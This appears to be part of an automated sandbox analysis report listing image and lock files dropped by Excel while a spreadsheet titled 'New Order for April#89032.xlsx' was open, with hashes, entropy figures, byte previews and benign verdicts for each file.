                                                                                                      Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33C3DEE4.jpeg
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):14198
                                                                                                      Entropy (8bit):7.916688725116637
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                                                                      MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                                                                      SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                                                                      SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                                                                      SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\346FC870.jpeg
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8815
                                                                                                      Entropy (8bit):7.944898651451431
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                                                      MD5:F06432656347B7042C803FE58F4043E1
                                                                                                      SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                                                      SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                                                      SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A0B656B.png
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:PNG image data, 992 x 192, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):10715
                                                                                                      Entropy (8bit):7.414910193109876
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:o98wfjpHmBG5X18nbtppfc3yX1cbzIvwjBYlE7KmnmF2888888u:SNGBgX+hpp0ClcHIvqYWnmFL
                                                                                                      MD5:FE450E7017E0F21A25701C4ABC68021B
                                                                                                      SHA1:06090A749D7077371AFBB5DC698C60FE861B676E
                                                                                                      SHA-256:B3A9530ADB5B09DCC14E71AD9AF5421BB2F0D95CEB93E41A2C053B77E48C7FCB
                                                                                                      SHA-512:815A8784FCA30B9F882CB460DB9B47919B13D8C32673BEA14CDB63E70424917B02E6F220E55E3710C7E97EAE15EBA7968936A585D235947AA7124E5042BEA577
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview: .PNG........IHDR..............c......sBIT....|.d.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>..);IDATx^....,G.7...@..$.....=........wwwwww....I.._....3wV.....S..w..........w[[R#. @....... @....[&........O?.R..e........ @........+.......A....... @......-...?.....O....... @..........f@....... @......- ._..... @....... @.@.....MS @....... @......../ZX.... @....... @ .F....... @....... ...S....... @...........|.-@... @....... @`)...0+....... @....... ..{.P..... @.......X..E.w...l... @....... @.....\.J...G.... @....... @.......LA_8.... @....... @`........co..O....... @..........-._<.... @....... @`...;.......?..... @......,^.....|..J @....... @..............?..... @......,^..O}..|..J @....... @......`......... @....... @.......i...gV...... @.......]...<..|.@... @....... @`..G."V._.... @....... @....^../............ @......!..o.L...he. @....... @...S...... @....... ........A....... @.............. @........b...ydS.j........ @......
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F4CB40C.png
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):51166
                                                                                                      Entropy (8bit):7.767050944061069
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                                                                      MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                                                                      SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                                                                      SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                                                                      SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\611091FA.jpeg
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 88x89, frames 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3455
                                                                                                      Entropy (8bit):7.774304410172069
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:aUE73PJLlC/btznr7ELFGcVMS5MFeEnuOOshNzSZn40YTo3:aUMBLlCDtn7CVVMS5JEnuUzSt4TT0
                                                                                                      MD5:B6EE1614D1302AD75B751F7134E57AA8
                                                                                                      SHA1:CD0071E2B61C622CFA38FACE83826A42CD6F7116
                                                                                                      SHA-256:6D90BF5FE7C4F0C03F0FAFA9EBCBDEAE938F8AA77829F448645AA51EEAE9D986
                                                                                                      SHA-512:849EBCD27DE319A9320E3A614FF57BF3E6292ACD68020E977435D84C17A7FBBFB460E7E07EA576EE6531359DC2A200BCC2CB828C7690841E433B3B6CA872CE6E
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: ......JFIF.............C....................................................................C.......................................................................Y.X.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..........o.K,.(....]....h&c..<.....vvg..Zg.w...O.O.&...........|.....YKqwk..341.... 8vR.0.9..V..I.XOmq%....(....E.#.C4..!.R..F..Z.Y.p...S.wj.....2.~....n?..?.o.J....v....E.........v..~..}..s.6....{...q.\>..+..J..N.Pq.....S..-!.ew../.d .lr...:g.3BH.......).........?.Y...0...G.3....-V..L7..%W.QG*.........g....;|L....g......U.....?.Y...0...^.E..>.K.......C.....3..U
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\65BB8ECE.emf
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3659592
                                                                                                      Entropy (8bit):1.0022313728649812
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:YFPAuIU4U9tVvfJHGCOd+FPAuIU4U9tVvfJHGCOd2:YmIvhGJd+mIvhGJd2
                                                                                                      MD5:737130889222DA6A24DB863283F9AA2B
                                                                                                      SHA1:91A31F3169BCDC0CBFC1F47E75AABDA68C764DA0
                                                                                                      SHA-256:7B23C702859098656105259373C4A99936AEFF58064521496320532F23BE4772
                                                                                                      SHA-512:C2B7A34156164DD7E18E9CE206BCAF8324A9B545E035A14145CE98EF7D94664816676DF0E62DE31E0A6604EEAF7B036C3DCD59223ABF3DCB35EFC42EEF108FD9
                                                                                                      Malicious:false
                                                                                                      Preview: ....l...............\...............dS.. EMF....H.7.....................V...........................fZ..U"..F...4...(...GDIC........l..u....................i...........................................i...A. ...]...............(.......].............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6AF88CAF.png
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):51166
                                                                                                      Entropy (8bit):7.767050944061069
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                                                                      MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                                                                      SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                                                                      SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                                                                      SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                                                                      Malicious:false
                                                                                                      Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D2F9C18.png
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:PNG image data, 992 x 192, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):10715
                                                                                                      Entropy (8bit):7.414910193109876
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:o98wfjpHmBG5X18nbtppfc3yX1cbzIvwjBYlE7KmnmF2888888u:SNGBgX+hpp0ClcHIvqYWnmFL
                                                                                                      MD5:FE450E7017E0F21A25701C4ABC68021B
                                                                                                      SHA1:06090A749D7077371AFBB5DC698C60FE861B676E
                                                                                                      SHA-256:B3A9530ADB5B09DCC14E71AD9AF5421BB2F0D95CEB93E41A2C053B77E48C7FCB
                                                                                                      SHA-512:815A8784FCA30B9F882CB460DB9B47919B13D8C32673BEA14CDB63E70424917B02E6F220E55E3710C7E97EAE15EBA7968936A585D235947AA7124E5042BEA577
                                                                                                      Malicious:false
                                                                                                      Preview: .PNG........IHDR..............c......sBIT....|.d.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>..);IDATx^....,G.7...@..$.....=........wwwwww....I.._....3wV.....S..w..........w[[R#. @....... @....[&........O?.R..e........ @........+.......A....... @......-...?.....O....... @..........f@....... @......- ._..... @....... @.@.....MS @....... @......../ZX.... @....... @ .F....... @....... ...S....... @...........|.-@... @....... @`)...0+....... @....... ..{.P..... @.......X..E.w...l... @....... @.....\.J...G.... @....... @.......LA_8.... @....... @`........co..O....... @..........-._<.... @....... @`...;.......?..... @......,^.....|..J @....... @..............?..... @......,^..O}..|..J @....... @......`......... @....... @.......i...gV...... @.......]...<..|.@... @....... @`..G."V._.... @....... @....^../............ @......!..o.L...he. @....... @...S...... @....... ........A....... @.............. @........b...ydS.j........ @......
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70052995.jpeg
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 88x89, frames 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3455
                                                                                                      Entropy (8bit):7.774304410172069
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:aUE73PJLlC/btznr7ELFGcVMS5MFeEnuOOshNzSZn40YTo3:aUMBLlCDtn7CVVMS5JEnuUzSt4TT0
                                                                                                      MD5:B6EE1614D1302AD75B751F7134E57AA8
                                                                                                      SHA1:CD0071E2B61C622CFA38FACE83826A42CD6F7116
                                                                                                      SHA-256:6D90BF5FE7C4F0C03F0FAFA9EBCBDEAE938F8AA77829F448645AA51EEAE9D986
                                                                                                      SHA-512:849EBCD27DE319A9320E3A614FF57BF3E6292ACD68020E977435D84C17A7FBBFB460E7E07EA576EE6531359DC2A200BCC2CB828C7690841E433B3B6CA872CE6E
                                                                                                      Malicious:false
                                                                                                      Preview: ......JFIF.............C....................................................................C.......................................................................Y.X.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..........o.K,.(....]....h&c..<.....vvg..Zg.w...O.O.&...........|.....YKqwk..341.... 8vR.0.9..V..I.XOmq%....(....E.#.C4..!.R..F..Z.Y.p...S.wj.....2.~....n?..?.o.J....v....E.........v..~..}..s.6....{...q.\>..+..J..N.Pq.....S..-!.ew../.d .lr...:g.3BH.......).........?.Y...0...G.3....-V..L7..%W.QG*.........g....;|L....g......U.....?.Y...0...^.E..>.K.......C.....3..U
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7DE011E6.png
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):79394
                                                                                                      Entropy (8bit):7.864111100215953
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                      MD5:16925690E9B366EA60B610F517789AF1
                                                                                                      SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                      SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                      SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                      Malicious:false
                                                                                                      Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1F47D39.jpeg
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8815
                                                                                                      Entropy (8bit):7.944898651451431
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                                                      MD5:F06432656347B7042C803FE58F4043E1
                                                                                                      SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                                                      SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                                                      SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                                                      Malicious:false
                                                                                                      Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C96B05B3.jpeg
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 178x124, frames 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7934
                                                                                                      Entropy (8bit):7.877426792469052
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:aPlVOjcI3QmjR79Z/7qjw0qwzhjBPlB4yinZe87:aPlIhJpqjwpwVjZSga
                                                                                                      MD5:BBACB9E08630847C0E6E84B5100C40C3
                                                                                                      SHA1:FDE4F15306F56139583ECB5E0EC99884A3F32371
                                                                                                      SHA-256:79505C5789C409D74A5F6C7D81C01DADBA9C7E80C7F7A6985CE5367C6FED2D2E
                                                                                                      SHA-512:E7C0A5E9FD51C4A813B7F70A6B5AD8F47AED7B7D1033A9F114B4D988CCD256CD376FC822EB6F9C4F9B3E095128AD905397C1F8D5AEE550615F2DD80E5AEA6F72
                                                                                                      Malicious:false
                                                                                                      Preview: ......JFIF.............C....................................................................C.......................................................................|...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..}...g...M.W...t....4K)..P*...I.Q......../.....B_..........U..z.g....d...p.-Z..^.o........_./Z..n.dk%......0..QX*.%.c..yv8p.hN.d..t'._.":.B_.......O.f....."R...............f..&.Zu[..-........c]....Z..~frx.[....a.j..H..Zl8y....x..h.)B...)"...*. ...t}[...}.p......._.H...w...iG..D.....9......{..}*.J...y....o..!..`.@....)8...s./...'.SL..B..}j...X.#Y..a.93\#...^&.
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE617A92.jpeg
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 178x124, frames 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7934
                                                                                                      Entropy (8bit):7.877426792469052
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:aPlVOjcI3QmjR79Z/7qjw0qwzhjBPlB4yinZe87:aPlIhJpqjwpwVjZSga
                                                                                                      MD5:BBACB9E08630847C0E6E84B5100C40C3
                                                                                                      SHA1:FDE4F15306F56139583ECB5E0EC99884A3F32371
                                                                                                      SHA-256:79505C5789C409D74A5F6C7D81C01DADBA9C7E80C7F7A6985CE5367C6FED2D2E
                                                                                                      SHA-512:E7C0A5E9FD51C4A813B7F70A6B5AD8F47AED7B7D1033A9F114B4D988CCD256CD376FC822EB6F9C4F9B3E095128AD905397C1F8D5AEE550615F2DD80E5AEA6F72
                                                                                                      Malicious:false
                                                                                                      Preview: ......JFIF.............C....................................................................C.......................................................................|...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..}...g...M.W...t....4K)..P*...I.Q......../.....B_..........U..z.g....d...p.-Z..^.o........_./Z..n.dk%......0..QX*.%.c..yv8p.hN.d..t'._.":.B_.......O.f....."R...............f..&.Zu[..-........c]....Z..~frx.[....a.j..H..Zl8y....x..h.)B...)"...*. ...t}[...}.p......._.H...w...iG..D.....9......{..}*.J...y....o..!..`.@....)8...s./...'.SL..B..}j...X.#Y..a.93\#...^&.
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D78A5477.png
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):79394
                                                                                                      Entropy (8bit):7.864111100215953
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                      MD5:16925690E9B366EA60B610F517789AF1
                                                                                                      SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                      SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                      SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                      Malicious:false
                                                                                                      Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                                                      C:\Users\user\Desktop\~$New Order for April#89032.xlsx
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):330
                                                                                                      Entropy (8bit):1.4377382811115937
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                      MD5:96114D75E30EBD26B572C1FC83D1D02E
